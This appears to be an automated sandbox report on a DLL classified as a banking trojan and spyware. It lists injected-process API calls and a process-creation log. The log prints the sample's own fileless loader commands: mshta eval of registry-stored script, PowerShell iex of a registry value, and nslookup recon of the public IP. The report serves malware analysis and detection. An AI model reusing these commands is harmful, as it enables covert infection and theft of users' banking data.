                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009432EC
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00938218
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00937278
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094AA6C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00926A68
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00939268
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094EB10
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00936B1C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00922B74
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009464F4
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00933C24
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00930474
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093ED94
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094DD9C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009385CC
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00938DF4
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00949524
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00937D44
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093FD6C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092C6F4
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00946E34
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00928628
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092779C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093DFB8
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00943F08
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00939770
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DF2F0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DB530
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C6A68
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67EEB10
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E3F08
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67CC6F4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E32EC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67ED2DC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C2B74
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D9770
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D6B1C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67CE008
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C3804
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DDFB8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C779C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D179C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E508C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67EC874
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C9074
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D3074
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D0474
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D7834
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D3C24
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E64F4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67EE0CF
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D40B4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E4988
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DFD6C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DD150
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D7D44
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E9524
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D8DF4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DC9F0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67CB1D8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DC1D4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D85CC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DD9AC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E59A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67EDD9C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DED94
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D7278
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67EAA6C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D9268
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67E6E34
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C8628
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67D8218
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_009788BB
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096E9BD
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_009852A0
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00964AFE
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00982339
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00972499
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00972C07
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0097C5F4
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00965518
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096AD2E
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00974658
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096279B
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456D1F8 CreateProcessAsUserW
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\loaddll32.exe | Section loaded: mspdb140.dll
                      Source: data.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B121F NtMapViewOfSection
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2495 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD37E0 NtMapViewOfSection
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD8055 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04570FA5 NtQueryInformationProcess
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456D00C memset,NtQueryInformationProcess
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB0FA5 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB680B NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BAD00C memset,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A78055 NtQueryVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092A8D4 NtWriteVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092B92C NtReadVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009252DC NtMapViewOfSection
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00922B08 NtQueryInformationProcess
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00947DAC NtCreateSection
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00940DE0 NtAllocateVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C2B08 NtQueryInformationProcess
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose
                      Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00970FA5 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0096D00C memset,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: aixojixg.dll.20.dr | Static PE information: No import functions for PE file found
                      Source: keehvxm3.dll.24.dr | Static PE information: No import functions for PE file found
                      Source: a52acufz.dll.19.dr | Static PE information: No import functions for PE file found
                      Source: ddwuzigh.dll.23.dr | Static PE information: No import functions for PE file found
                      Source: data.dll | Binary or memory string: OriginalFilenameSoon.dll8 vs data.dll
                      Source: data.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20211007
                      Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: data.dll | Virustotal: Detection: 7%
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,BonebeginJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,FatherJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,RatherdesignJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
